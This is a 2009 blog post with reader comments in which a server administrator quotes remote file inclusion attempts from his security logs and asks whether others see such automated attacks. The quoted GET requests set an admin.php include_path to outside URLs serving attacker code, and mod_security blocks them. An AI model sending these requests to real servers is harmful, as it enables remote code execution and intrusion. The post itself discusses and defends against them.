Nov 23, 2009

Let's do something stupid!

Let's try some stupid HTTP requests to my server :) For example, this:
GET /article/advanced-guestbook-spam-blockin…//admin.php?include_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1
Connection: close
or
GET /article/advanced-guestbook-spam-blockin…//admin.php?include_path=http://www.vnmhost.net/01.gif? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: dmitry-dulepov.com
User-Agent: Mozilla/5.0
or
GET /article//admin.php?include_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1
Connection: close
Host: dmitry-dulepov.com
User-Agent: Mozilla/5.0
or
GET /article/advanced-guestbook-spam-blocking.html//admin.php?include_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1
Connection: close
Host: dmitry-dulepov.com
User-Agent: Mozilla/5.0
I see requests like this daily in security logs of both my servers. They all are stopped by mod_security.
I wonder am I the only one who gets tons of this scum? :) If anybody else monitors his/her server security, you are welcome to share your "statistics" about these automated attacks to non–existing web applications.

9 comments:

  1. See them all the time. None of them get through, so I just ignore them.

    ReplyDelete
  2. Same here. Just ignore the noise.

    ReplyDelete
  3. I've once tried to setup mod_security2 for a Typo3 installation... I didn't manage to do it in the time frame I deemed appropriate... It blocked away stuff like the standard tt_news "click-to-enlarge".



    Are there any Typo3-mod_security tutorials around or maybe even a ruleset maintained by the t3sec team or something like that?

    ReplyDelete
  4. Chris, no, nothing like that around. Security is a very special topic...



    Dan & Steffen, they do not bother me much except that I always wonder for stupidity of such attacks. They not only waste my resources, they also waste their own. It looks like some beginner hacker attempts.

    ReplyDelete
  5. I think most of them are simply bruteforce-attacks that try various of known security hole expolits - without first checking the target system and _then_ apply some exploits to it.

    ReplyDelete
  6. Same here, lot of noise with these requests. However I have had 2 server hacked with the success of such commands.

    One was a phpmyadmin exploit which gave the attacker a shell access from a forged http request. Another had been exploiting a hole in phpnuke and allowed the download and execution of a remote shell.

    Almost every piece of software has security holes, so solutions like mod_security are required to block such http requests before they reach any hole. It too bad mod_security is so difficult to configure though...

    ReplyDelete
  7. I think that this blog is dying, unfortunately...

    ReplyDelete
  8. Tomasz, it does not :) I simply do not have enough time and motivation to write on TYPO3 topics. I have lots of other stuff to write about but I doubt it will be interesting to existing visitors :(

    ReplyDelete
  9. I hope this blog doesn't die, as I've read some of the most brilliant posts about TYPO3 here.

    ReplyDelete